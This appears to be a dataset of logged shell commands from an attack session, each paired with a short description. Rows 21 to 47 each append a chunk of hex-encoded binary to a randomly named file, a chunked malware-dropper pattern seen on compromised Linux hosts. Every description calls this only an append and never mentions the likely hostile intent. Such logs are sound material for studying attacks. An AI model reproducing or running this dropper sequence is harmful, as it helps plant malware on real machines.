21dae9a5de5b | 2021_2022 | 21 | echo -ne '\x3B\x24\x84\x73\xB0\x37\x1B\xA2\x7B\xB7\x1F\x4F\x06\x33\x5D\x97\x8F\xBB\x28\x43\x44\xED\x0B\x36\x09\x47\xBF\xB3\x4B\x85\xB7\xDF\xBD\xD6\x6E\x63\x83\x80\x53\x03\x4B\x67\x05\x24\xA5\xD0\xF4\xFB\x6E\x4B\x09\x0F\x2B\x1C\x23\xA4\x8C\x82\x73\xC8\x8F\x05\xA1\xEB'>>./catbpnhz | # echo -ne '\x3B\x24\x84\x73\xB0\x37\x1B\xA2\x7B\xB7\x1F\x4F\x06\x33\x5D\x97\x8F\xBB\x28\x43\x44\xED\x0B\x36\x09\x47\xBF\xB3\x4B\x85\xB7\xDF\xBD\xD6\x6E\x63\x83\x80\x53\x03\x4B\x67\x05\x24\xA5\xD0\xF4\xFB\x6E\x4B\x09\x0F\x2B\x1C\x23\xA4\x8C\x82\x73\xC8\x8F\x05\xA1\xEB'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 22 | echo -ne '\x06\x06\x2F\xC8\xC7\x04\x2F\x06\xC2\x9B\xB0\x6F\x20\x2B\x0B\x3B\x3B\x2F\x84\xC1\x0B\x21\x83\x42\xB4\x0D\x7F\x6B\x7E\x61\xF8\x87\x84\x86\x60\x8F\xA5\xA6\x4B\x24\x01\xFF\xF8\x03\xA1\x34\xFC\xFE\xDF\xE8\x24\xA7\x8F\x87\x88\xA4\x8F\x88\x85\xAC\x33\xAF\xA8\xFB'>>./catbpnhz | # echo -ne '\x06\x06\x2F\xC8\xC7\x04\x2F\x06\xC2\x9B\xB0\x6F\x20\x2B\x0B\x3B\x3B\x2F\x84\xC1\x0B\x21\x83\x42\xB4\x0D\x7F\x6B\x7E\x61\xF8\x87\x84\x86\x60\x8F\xA5\xA6\x4B\x24\x01\xFF\xF8\x03\xA1\x34\xFC\xFE\xDF\xE8\x24\xA7\x8F\x87\x88\xA4\x8F\x88\x85\xAC\x33\xAF\xA8\xFB'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 23 | echo -ne '\xA2\x36\xEC\xAD\x2D\x56\xAF\x4F\xAF\x99\x86\x94\xFF\x8B\x36\x58\xC8\x3E\x00\xFF\xFF\x00\x00\x63\x50\xF3\xDB\xB7\x37\x0C\x90\xA7\x68\x00\x80\xC8\x6F\xA0\x40\x21\x24\x9D\x30\xBD\xFD\xF6\xDD\x27\xA9\x1F\xAE\x00\x38\x27\xAF\x17\x27\xAB\x00\x44\x27\x65\x48\x27'>>./catbpnhz | # echo -ne '\xA2\x36\xEC\xAD\x2D\x56\xAF\x4F\xAF\x99\x86\x94\xFF\x8B\x36\x58\xC8\x3E\x00\xFF\xFF\x00\x00\x63\x50\xF3\xDB\xB7\x37\x0C\x90\xA7\x68\x00\x80\xC8\x6F\xA0\x40\x21\x24\x9D\x30\xBD\xFD\xF6\xDD\x27\xA9\x1F\xAE\x00\x38\x27\xAF\x17\x27\xAB\x00\x44\x27\x65\x48\x27'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 24 | echo -ne '\xAD\xFD\xAD\x73\xBF\x36\x27\xAA\x00\x4C\x24\x50\xF4\x03\x02\x20\x21\x10\x98\x00\x81\x6B\x8F\xB5\xFF\x4F\x01\x04\x10\x21\x90\x43\x37\x6F\x60\xFF\xFA\xFB\x12\xBE\xA1\xB5\x76\x01\x20\x13\x4E\x0F\xA7\x01\x14\x4E\xFF\xFD\xDB\xF6\x4C\xF6\x1B\x0F\x4F\x28\x6B\x06'>>./catbpnhz | # echo -ne '\xAD\xFD\xAD\x73\xBF\x36\x27\xAA\x00\x4C\x24\x50\xF4\x03\x02\x20\x21\x10\x98\x00\x81\x6B\x8F\xB5\xFF\x4F\x01\x04\x10\x21\x90\x43\x37\x6F\x60\xFF\xFA\xFB\x12\xBE\xA1\xB5\x76\x01\x20\x13\x4E\x0F\xA7\x01\x14\x4E\xFF\xFD\xDB\xF6\x4C\xF6\x1B\x0F\x4F\x28\x6B\x06'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 25 | echo -ne '\x33\x01\x7D\xB7\xED\xBA\x05\x3B\x44\x07\x25\x18\x0F\xA5\x1B\xA6\xFF\xFB\xA0\x64\xDD\xEE\x6E\xCE\x53\x1F\x05\x38\x21\xF7\x14\x90\xC4\x09\x90\xA3\xDE\xDD\xED\xD6\x5F\x87\x2B\x00\x43\x03\x30\x42\x83\x82\x00\x02\x2F\xFB\xDD\x75\xDF\x9D\x38\x2B\xA0\xC2\x57\xC6'>>./catbpnhz | # echo -ne '\x33\x01\x7D\xB7\xED\xBA\x05\x3B\x44\x07\x25\x18\x0F\xA5\x1B\xA6\xFF\xFB\xA0\x64\xDD\xEE\x6E\xCE\x53\x1F\x05\x38\x21\xF7\x14\x90\xC4\x09\x90\xA3\xDE\xDD\xED\xD6\x5F\x87\x2B\x00\x43\x03\x30\x42\x83\x82\x00\x02\x2F\xFB\xDD\x75\xDF\x9D\x38\x2B\xA0\xC2\x57\xC6'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 26 | echo -ne '\x3B\xCB\xFF\xF5\x67\xA3\xA7\xAF\x0C\x58\xD3\x7D\xA3\xA0\x00\x49\x03\x4A\x4B\x4B\x18\xB7\x0C\x25\x93\xE4\xCC\x01\xE3\xB6\xA6\xEB\x3A\x4B\x4C\x43\x4D\x03\x4E\x4F\x1D\x30\x07\xE1\xED\xD6\x47\x2B\x0C\x90\x33\x30\x90\xA3\x50\x62\x10\xD9\x34\x63\xED\x23\x00\x46'>>./catbpnhz | # echo -ne '\x3B\xCB\xFF\xF5\x67\xA3\xA7\xAF\x0C\x58\xD3\x7D\xA3\xA0\x00\x49\x03\x4A\x4B\x4B\x18\xB7\x0C\x25\x93\xE4\xCC\x01\xE3\xB6\xA6\xEB\x3A\x4B\x4C\x43\x4D\x03\x4E\x4F\x1D\x30\x07\xE1\xED\xD6\x47\x2B\x0C\x90\x33\x30\x90\xA3\x50\x62\x10\xD9\x34\x63\xED\x23\x00\x46'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 27 | echo -ne '\x03\x4B\x62\x84\x62\x30\xE1\x08\x7F\x66\xA2\xD3\xAD\xFF\xF4\x1B\xC0\x00\xE5\xA1\xF0\xB6\x5B\x82\x21\x93\x17\x3C\x0F\x0B\x9B\x8D\x5B\xF7\x5F\x33\x14\x50\x00\x0B\xA3\x13\x27\x4F\x3D\x24\x31\xD8\x1D\xD8\x0B\x90\x62\x00\x00\x1F\xA0\x0F\x10\x44\x0B\xCD\xF0\x68'>>./catbpnhz | # echo -ne '\x03\x4B\x62\x84\x62\x30\xE1\x08\x7F\x66\xA2\xD3\xAD\xFF\xF4\x1B\xC0\x00\xE5\xA1\xF0\xB6\x5B\x82\x21\x93\x17\x3C\x0F\x0B\x9B\x8D\x5B\xF7\x5F\x33\x14\x50\x00\x0B\xA3\x13\x27\x4F\x3D\x24\x31\xD8\x1D\xD8\x0B\x90\x62\x00\x00\x1F\xA0\x0F\x10\x44\x0B\xCD\xF0\x68'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 28 | echo -ne '\x57\x63\x23\x27\x23\x2F\x03\xAF\xA1\xF0\x6B\xBB\x0F\x14\x64\x4B\x57\x30\xAB\xBA\xDD\x56\x78\x9B\x77\xEB\x90\x77\x90\x83\x40\xC2\xB9\x41\x06\xE9\xE3\x62\x62\x43\x97\x43\xC3\x7B\xA1\xBB\x54\xAA\xFF\xF6\xA7\xCE\x90\xCB\x2C\xD9\x59\xE3\x8F\x89\xC3\x43\x38\x3F'>>./catbpnhz | # echo -ne '\x57\x63\x23\x27\x23\x2F\x03\xAF\xA1\xF0\x6B\xBB\x0F\x14\x64\x4B\x57\x30\xAB\xBA\xDD\x56\x78\x9B\x77\xEB\x90\x77\x90\x83\x40\xC2\xB9\x41\x06\xE9\xE3\x62\x62\x43\x97\x43\xC3\x7B\xA1\xBB\x54\xAA\xFF\xF6\xA7\xCE\x90\xCB\x2C\xD9\x59\xE3\x8F\x89\xC3\x43\x38\x3F'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 29 | echo -ne '\x2F\x6C\xFB\x25\x5F\xDB\x47\x25\x26\x7C\x8C\x13\x38\x43\xA1\x95\xDE\xC2\xAB\xF5\x43\x23\x3B\xCB\xBE\x2D\x39\xBE\x2F\x24\x4A\x7C\x5C\x1B\x23\x07\xB7\x14\x60\x00\x0E\xB7\x31\x0A\x1F\xE3\x10\xC7\x2B\x23\x06\xB7\x00\xCA\xFD\x83\xF0\x6B\x5F\xDB\x90\x85\x37\x45'>>./catbpnhz | # echo -ne '\x2F\x6C\xFB\x25\x5F\xDB\x47\x25\x26\x7C\x8C\x13\x38\x43\xA1\x95\xDE\xC2\xAB\xF5\x43\x23\x3B\xCB\xBE\x2D\x39\xBE\x2F\x24\x4A\x7C\x5C\x1B\x23\x07\xB7\x14\x60\x00\x0E\xB7\x31\x0A\x1F\xE3\x10\xC7\x2B\x23\x06\xB7\x00\xCA\xFD\x83\xF0\x6B\x5F\xDB\x90\x85\x37\x45'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 30 | echo -ne '\x18\x2B\x00\xA2\x10\x2B\x77\xAD\x50\x28\x2F\x1F\x73\x33\x8B\xDE\x01\x40\x90\xD1\x48\x18\x17\x68\x17\xEF\x18\xA4\xA6\xBB\x68\x3B\x70\xBB\x28\xAF\xB3\x00\x61\xE9\xE8\xFA\xD4\xAF\xB2\x00\xD0\x6F\xCC\xC7\xC8\xC0\xEB\xAC\x61\xAB\x31\xB7\x13\x08\xE7\xA7\x47\xF1'>>./catbpnhz | # echo -ne '\x18\x2B\x00\xA2\x10\x2B\x77\xAD\x50\x28\x2F\x1F\x73\x33\x8B\xDE\x01\x40\x90\xD1\x48\x18\x17\x68\x17\xEF\x18\xA4\xA6\xBB\x68\x3B\x70\xBB\x28\xAF\xB3\x00\x61\xE9\xE8\xFA\xD4\xAF\xB2\x00\xD0\x6F\xCC\xC7\xC8\xC0\xEB\xAC\x61\xAB\x31\xB7\x13\x08\xE7\xA7\x47\xF1'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 31 | echo -ne '\x26\x4D\xF3\x01\x67\xE7\xE8\x9B\xB0\x41\xBA\xD6\xD7\x38\xAB\x23\xC5\x85\x6B\x52\x7B\xC7\x6C\xA7\x23\xF3\x68\x01\xA0\x48\x27\x0B\x7B\xE1\xB6\xE9\x98\xA1\xA9\x25\x29\x1B\x15\x2E\x6F\x01\xC0\x50\x13\x4B\xB7\xE3\x42\x23\xC8\xA1\xCF\x25\x4A\x13\x42\x24\xF6\xFF'>>./catbpnhz | # echo -ne '\x26\x4D\xF3\x01\x67\xE7\xE8\x9B\xB0\x41\xBA\xD6\xD7\x38\xAB\x23\xC5\x85\x6B\x52\x7B\xC7\x6C\xA7\x23\xF3\x68\x01\xA0\x48\x27\x0B\x7B\xE1\xB6\xE9\x98\xA1\xA9\x25\x29\x1B\x15\x2E\x6F\x01\xC0\x50\x13\x4B\xB7\xE3\x42\x23\xC8\xA1\xCF\x25\x4A\x13\x42\x24\xF6\xFF'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 32 | echo -ne '\x7F\xB5\x0F\xBF\x67\x01\x6C\x80\x2B\x01\xAE\xC8\x2B\x24\x11\xFF\x80\x01\x8D\x90\x0B\x50\x98\xD0\xF0\xCA\x98\x2B\xDB\x68\x17\x23\xC2\xEF\xDD\xDD\x17\x0D\x24\x03\xEB\xEF\x00\x78\x83\x97\x01\x87\x17\xEB\x28\xDD\x40\xE7\x57\x03\x33\x08\x1A\xFB\xB7\x35\xC3\x87'>>./catbpnhz | # echo -ne '\x7F\xB5\x0F\xBF\x67\x01\x6C\x80\x2B\x01\xAE\xC8\x2B\x24\x11\xFF\x80\x01\x8D\x90\x0B\x50\x98\xD0\xF0\xCA\x98\x2B\xDB\x68\x17\x23\xC2\xEF\xDD\xDD\x17\x0D\x24\x03\xEB\xEF\x00\x78\x83\x97\x01\x87\x17\xEB\x28\xDD\x40\xE7\x57\x03\x33\x08\x1A\xFB\xB7\x35\xC3\x87'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 33 | echo -ne '\x9F\x77\x2B\x0B\x12\x00\x00\x0E\x30\xB7\x83\x7D\x37\xCB\xA4\x00\x37\x90\x82\x3F\x02\x18\x25\xA3\x18\xBF\xD0\xDC\xC3\x25\xA0\xC3\x84\x3F\x07\xC7\x02\x11\xC0\x01\x63\x5D\xE1\x42\x6B\x57\x7F\xF7\x30\x45\x68\x4F\x68\x2B\xC2\x36\x20\xC5\x09\x40\x37\xB3\x64\x2A'>>./catbpnhz | # echo -ne '\x9F\x77\x2B\x0B\x12\x00\x00\x0E\x30\xB7\x83\x7D\x37\xCB\xA4\x00\x37\x90\x82\x3F\x02\x18\x25\xA3\x18\xBF\xD0\xDC\xC3\x25\xA0\xC3\x84\x3F\x07\xC7\x02\x11\xC0\x01\x63\x5D\xE1\x42\x6B\x57\x7F\xF7\x30\x45\x68\x4F\x68\x2B\xC2\x36\x20\xC5\x09\x40\x37\xB3\x64\x2A'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 34 | echo -ne '\x19\xAC\x0D\x4F\x97\xA3\x78\xAC\x7B\xBF\x10\xE0\xFF\xC7\x2A\x57\x97\x32\x22\x10\x25\x1B\xB0\xAE\x6B\xCF\xC2\xFB\x97\x13\x38\x6B\x47\xBB\xA6\xB2\x09\x19\x40\x67\x6B\x83\x35\x30\x6C\xC2\xBB\x98\x4F\x6B\x11\x1D\x85\x76\xFA\xB7\x00\xC0\xE3\xC3\x9B\xBF\xE4\x57'>>./catbpnhz | # echo -ne '\x19\xAC\x0D\x4F\x97\xA3\x78\xAC\x7B\xBF\x10\xE0\xFF\xC7\x2A\x57\x97\x32\x22\x10\x25\x1B\xB0\xAE\x6B\xCF\xC2\xFB\x97\x13\x38\x6B\x47\xBB\xA6\xB2\x09\x19\x40\x67\x6B\x83\x35\x30\x6C\xC2\xBB\x98\x4F\x6B\x11\x1D\x85\x76\xFA\xB7\x00\xC0\xE3\xC3\x9B\xBF\xE4\x57'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 35 | echo -ne '\x52\xAC\x48\xE3\x97\xE3\x40\xCE\xFA\x70\x1B\xBB\xE2\x5B\x0B\xEA\x2F\x31\x4A\x06\x33\x17\x97\xFF\x12\x8B\xC7\x64\x90\x09\x9B\xC3\xF7\x89\xC7\x41\xC6\x68\x06\x84\xC7\xC7\xA5\x4D\xD3\x11\x92\x05\xB7\x8F\x8F\x8F\x7E\xDB\xC1\x30\xD3\xD8\x18\x87\x82\xCF\x01\x60'>>./catbpnhz | # echo -ne '\x52\xAC\x48\xE3\x97\xE3\x40\xCE\xFA\x70\x1B\xBB\xE2\x5B\x0B\xEA\x2F\x31\x4A\x06\x33\x17\x97\xFF\x12\x8B\xC7\x64\x90\x09\x9B\xC3\xF7\x89\xC7\x41\xC6\x68\x06\x84\xC7\xC7\xA5\x4D\xD3\x11\x92\x05\xB7\x8F\x8F\x8F\x7E\xDB\xC1\x30\xD3\xD8\x18\x87\x82\xCF\x01\x60'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 36 | echo -ne '\xC3\x0A\x48\x37\x13\x01\x80\xCB\x67\x4D\x8A\x14\x90\x47\x9F\x8B\x90\xF1\xB3\x3E\x87\x15\x84\x67\x12\x00\x00\x0D\x13\xC7\x61\xC0\x18\xA3\x51\x4F\xA3\x45\xD2\x31\x52\x0A\xBB\xA7\xA3\xC7\x86\x42\x9A\xB1\xB3\xA0\xC0\x24\x29\x61\x60\x4C\x8F\xD3\x63\xC9\x2B\x90'>>./catbpnhz | # echo -ne '\xC3\x0A\x48\x37\x13\x01\x80\xCB\x67\x4D\x8A\x14\x90\x47\x9F\x8B\x90\xF1\xB3\x3E\x87\x15\x84\x67\x12\x00\x00\x0D\x13\xC7\x61\xC0\x18\xA3\x51\x4F\xA3\x45\xD2\x31\x52\x0A\xBB\xA7\xA3\xC7\x86\x42\x9A\xB1\xB3\xA0\xC0\x24\x29\x61\x60\x4C\x8F\xD3\x63\xC9\x2B\x90'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 37 | echo -ne '\xA0\x15\x27\xCB\xB1\x2D\x41\x72\xFF\x5A\x02\x4C\x2B\xF6\xBA\x04\xD9\xC0\x28\x7B\x3F\x2E\x7F\xBB\x66\x84\x6E\x44\x3F\xAD\x4F\x80\x0C\xC6\x8B\x90\x60\x14\x8D\x03\x40\x18\x89\x90\x92\x5B\x03\x20\xCD\x84\x0C\x42\xC7\xA7\x0C\x85\x74\x03\xC0\xB3\xA0\x8A\x58\x03'>>./catbpnhz | # echo -ne '\xA0\x15\x27\xCB\xB1\x2D\x41\x72\xFF\x5A\x02\x4C\x2B\xF6\xBA\x04\xD9\xC0\x28\x7B\x3F\x2E\x7F\xBB\x66\x84\x6E\x44\x3F\xAD\x4F\x80\x0C\xC6\x8B\x90\x60\x14\x8D\x03\x40\x18\x89\x90\x92\x5B\x03\x20\xCD\x84\x0C\x42\xC7\xA7\x0C\x85\x74\x03\xC0\xB3\xA0\x8A\x58\x03'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 38 | echo -ne '\xD6\x64\x03\x98\x27\x12\x93\x2D\x41\x72\x69\x9B\xFF\x26\x02\xE4\x80\x95\x84\x18\xC7\x17\x00\x88\x2C\x09\xDD\x02\x3F\xE1\xC7\x3F\x79\x42\xEF\x82\xBC\xBF\x6F\x38\xE0\x0D\xFE\x8E\x06\x80\x63\x78\xAF\xB7\x00\x74\xAF\xB6\xC3\x69\x3A\x68\xFC\xAF\xB5\x00\x6C\xAF'>>./catbpnhz | # echo -ne '\xD6\x64\x03\x98\x27\x12\x93\x2D\x41\x72\x69\x9B\xFF\x26\x02\xE4\x80\x95\x84\x18\xC7\x17\x00\x88\x2C\x09\xDD\x02\x3F\xE1\xC7\x3F\x79\x42\xEF\x82\xBC\xBF\x6F\x38\xE0\x0D\xFE\x8E\x06\x80\x63\x78\xAF\xB7\x00\x74\xAF\xB6\xC3\x69\x3A\x68\xFC\xAF\xB5\x00\x6C\xAF'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 39 | echo -ne '\xB4\xFB\xC7\x64\x60\xC0\xD0\xA9\xA6\x5C\x58\xC7\xCB\x71\x84\x36\x5D\x8D\xA0\xA8\x07\xB8\x21\xCF\x80\xB0\x53\x5B\x93\x2B\xA7\x17\x1F\x48\x92\xA0\xA3\x62\xEC\x43\x68\x89\x1C\xEB\x02\x80\x20\x1B\x24\x1D\xFA\x54\xEB\x4B\x27\x4B\x07\x8C\x02\xA3\x7B\x03\x46\xBF'>>./catbpnhz | # echo -ne '\xB4\xFB\xC7\x64\x60\xC0\xD0\xA9\xA6\x5C\x58\xC7\xCB\x71\x84\x36\x5D\x8D\xA0\xA8\x07\xB8\x21\xCF\x80\xB0\x53\x5B\x93\x2B\xA7\x17\x1F\x48\x92\xA0\xA3\x62\xEC\x43\x68\x89\x1C\xEB\x02\x80\x20\x1B\x24\x1D\xFA\x54\xEB\x4B\x27\x4B\x07\x8C\x02\xA3\x7B\x03\x46\xBF'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 40 | echo -ne '\x2B\x2E\x02\xA0\x28\x21\xB3\x18\x17\x1F\xF9\x67\x07\x1B\xE0\x17\x40\x88\x3B\x05\x00\x32\x8F\x86\x80\x73\x75\x2F\xB1\x8A\x7C\x8F\x41\x94\x02\xF3\x02\x87\x8F\xF6\x58\xE4\xAC\x10\x27\x90\x47\x99\x84\x14\x7B\x0B\x6F\xA1\x4B\x4F\x2C\x0B\x06\x1B\xB7\xFF\x84\xBD'>>./catbpnhz | # echo -ne '\x2B\x2E\x02\xA0\x28\x21\xB3\x18\x17\x1F\xF9\x67\x07\x1B\xE0\x17\x40\x88\x3B\x05\x00\x32\x8F\x86\x80\x73\x75\x2F\xB1\x8A\x7C\x8F\x41\x94\x02\xF3\x02\x87\x8F\xF6\x58\xE4\xAC\x10\x27\x90\x47\x99\x84\x14\x7B\x0B\x6F\xA1\x4B\x4F\x2C\x0B\x06\x1B\xB7\xFF\x84\xBD'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 41 | echo -ne '\xED\xB3\xDA\x1F\x89\x8C\x12\xBD\x1A\x3F\x7B\xC1\x62\xCB\xCE\x80\xB7\xAB\xB7\x69\xF8\xBA\x61\xB3\x43\xD4\xB3\x8F\x27\x8F\xA6\x69\x9A\xA6\x8F\x8F\x8F\x8F\x8F\xED\x20\x60\x9A\x8F\x8F\x37\x80\x16\x33\x25\x06\x1B\x84\xE6\x73\xBA\x07\xF0\x8F\xE5\xC9\x13\x1A\x17'>>./catbpnhz | # echo -ne '\xED\xB3\xDA\x1F\x89\x8C\x12\xBD\x1A\x3F\x7B\xC1\x62\xCB\xCE\x80\xB7\xAB\xB7\x69\xF8\xBA\x61\xB3\x43\xD4\xB3\x8F\x27\x8F\xA6\x69\x9A\xA6\x8F\x8F\x8F\x8F\x8F\xED\x20\x60\x9A\x8F\x8F\x37\x80\x16\x33\x25\x06\x1B\x84\xE6\x73\xBA\x07\xF0\x8F\xE5\xC9\x13\x1A\x17'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 42 | echo -ne '\x7B\x37\x64\xDF\xB8\x2E\xB4\x2A\xFC\x20\x44\xAF\xBE\x20\x40\x7F\xB6\x7F\x20\x38\xA1\x72\xB9\x5C\x20\x34\x20\x30\x20\x2C\x3C\xED\xD5\xED\x42\x7F\x20\x24\xEF\x20\x20\x03\x55\xB8\x51\x98\xD5\xF0\x21\x53\x87\x63\x41\x9C\x21\x49\x3D\x76\x8B\xCB\xC0\xB0\x21\xFB'>>./catbpnhz | # echo -ne '\x7B\x37\x64\xDF\xB8\x2E\xB4\x2A\xFC\x20\x44\xAF\xBE\x20\x40\x7F\xB6\x7F\x20\x38\xA1\x72\xB9\x5C\x20\x34\x20\x30\x20\x2C\x3C\xED\xD5\xED\x42\x7F\x20\x24\xEF\x20\x20\x03\x55\xB8\x51\x98\xD5\xF0\x21\x53\x87\x63\x41\x9C\x21\x49\x3D\x76\x8B\xCB\xC0\xB0\x21\xFB'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 43 | echo -ne '\x2B\x83\xD8\x49\x6A\x04\x6F\x40\x98\x17\x4B\x46\x2E\x84\xAD\x5A\x0B\xB8\x9F\x60\x10\x0D\x0D\xBF\x45\xBF\x18\x27\xB4\x10\x19\x43\x4C\x9F\x3D\x84\x08\x13\xC2\x02\x00\x23\x10\x8F\x87\xC3\x0D\x85\x16\x1B\x83\x8B\xA4\x02\x40\xCB\xF7\x06\x76\xE1\xFF\xEB\xA3\x10'>>./catbpnhz | # echo -ne '\x2B\x83\xD8\x49\x6A\x04\x6F\x40\x98\x17\x4B\x46\x2E\x84\xAD\x5A\x0B\xB8\x9F\x60\x10\x0D\x0D\xBF\x45\xBF\x18\x27\xB4\x10\x19\x43\x4C\x9F\x3D\x84\x08\x13\xC2\x02\x00\x23\x10\x8F\x87\xC3\x0D\x85\x16\x1B\x83\x8B\xA4\x02\x40\xCB\xF7\x06\x76\xE1\xFF\xEB\xA3\x10'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 44 | echo -ne '\x01\x2B\x17\x67\xB6\xC1\x84\x42\xD0\x57\xCB\x73\x10\x17\xB1\x35\x4C\x78\x42\x18\xE3\x6F\x04\x37\xDD\x4E\x8E\xB5\x87\x03\xA0\x60\x3F\x1F\x80\x20\xC0\x24\x07\xF6\x30\x03\x80\x21\x17\x03\x5B\xF8\xBA\xC8\x90\x7B\xCC\x73\x16\x57\xCA\x07\x3A\xFE\xF7\x16\x0F\xC8'>>./catbpnhz | # echo -ne '\x01\x2B\x17\x67\xB6\xC1\x84\x42\xD0\x57\xCB\x73\x10\x17\xB1\x35\x4C\x78\x42\x18\xE3\x6F\x04\x37\xDD\x4E\x8E\xB5\x87\x03\xA0\x60\x3F\x1F\x80\x20\xC0\x24\x07\xF6\x30\x03\x80\x21\x17\x03\x5B\xF8\xBA\xC8\x90\x7B\xCC\x73\x16\x57\xCA\x07\x3A\xFE\xF7\x16\x0F\xC8'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 45 | echo -ne '\x02\x20\x2B\x88\x28\x12\xF1\xFF\xC5\x3B\x09\x32\x1C\x23\x01\x17\x03\x9F\xB0\x00\x43\x18\x10\x9F\x2F\xB4\x16\x0C\x86\x91\x1B\xB5\xF3\x9F\x8F\x69\x9A\xA6\x69\x8F\x8F\x8F\x8F\x8F\x9E\x60\x9A\xA6\x8F\x8F\x8F\xF7\x20\x48\x33\xC8\x4B\xE8\x4F\xF3\xE7\x35\x7C\xC0'>>./catbpnhz | # echo -ne '\x02\x20\x2B\x88\x28\x12\xF1\xFF\xC5\x3B\x09\x32\x1C\x23\x01\x17\x03\x9F\xB0\x00\x43\x18\x10\x9F\x2F\xB4\x16\x0C\x86\x91\x1B\xB5\xF3\x9F\x8F\x69\x9A\xA6\x69\x8F\x8F\x8F\x8F\x8F\x9E\x60\x9A\xA6\x8F\x8F\x8F\xF7\x20\x48\x33\xC8\x4B\xE8\x4F\xF3\xE7\x35\x7C\xC0'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 46 | echo -ne '\x90\x64\x00\x04\xDF\xB0\x50\x42\x21\x19\x33\xE7\xDB\x72\x04\xC2\x85\xC1\x40\xA8\xDB\x35\xBA\x85\x4C\x40\xC0\x4B\xD8\x48\x23\x79\x12\x9B\xB1\xFF\xD5\x83\xD2\x98\x4B\x32\x8C\xB3\x17\x60\x9B\xD3\x0B\xF6\x42\xC7\xD7\xCF\x97\x42\x0A\x61\x56\xCD\x3B\xBB\xB3\x78'>>./catbpnhz | # echo -ne '\x90\x64\x00\x04\xDF\xB0\x50\x42\x21\x19\x33\xE7\xDB\x72\x04\xC2\x85\xC1\x40\xA8\xDB\x35\xBA\x85\x4C\x40\xC0\x4B\xD8\x48\x23\x79\x12\x9B\xB1\xFF\xD5\x83\xD2\x98\x4B\x32\x8C\xB3\x17\x60\x9B\xD3\x0B\xF6\x42\xC7\xD7\xCF\x97\x42\x0A\x61\x56\xCD\x3B\xBB\xB3\x78'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 47 | echo -ne '\x49\x73\x00\x40\xF5\x33\xC8\xA6\x81\x66\x10\x17\xA8\x50\x0F\x4C\xA5\x82\x69\x9A\x48\x44\x40\xC7\xE7\xFD\x27\x18\x81\x38\x0F\x83\xDF\xD4\x24\x62\x55\xA8\x8C\x53\xA7\xDA\x1B\x45\x04\x8C\x66\x07\x73\x1F\x60\x6B\x6A\x03\xB3\x15\xEF\x14\x13\xAF\xB0\x50\xA0\x50'>>./catbpnhz | # echo -ne '\x49\x73\x00\x40\xF5\x33\xC8\xA6\x81\x66\x10\x17\xA8\x50\x0F\x4C\xA5\x82\x69\x9A\x48\x44\x40\xC7\xE7\xFD\x27\x18\x81\x38\x0F\x83\xDF\xD4\x24\x62\x55\xA8\x8C\x53\xA7\xDA\x1B\x45\x04\x8C\x66\x07\x73\x1F\x60\x6B\x6A\x03\xB3\x15\xEF\x14\x13\xAF\xB0\x50\xA0\x50'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
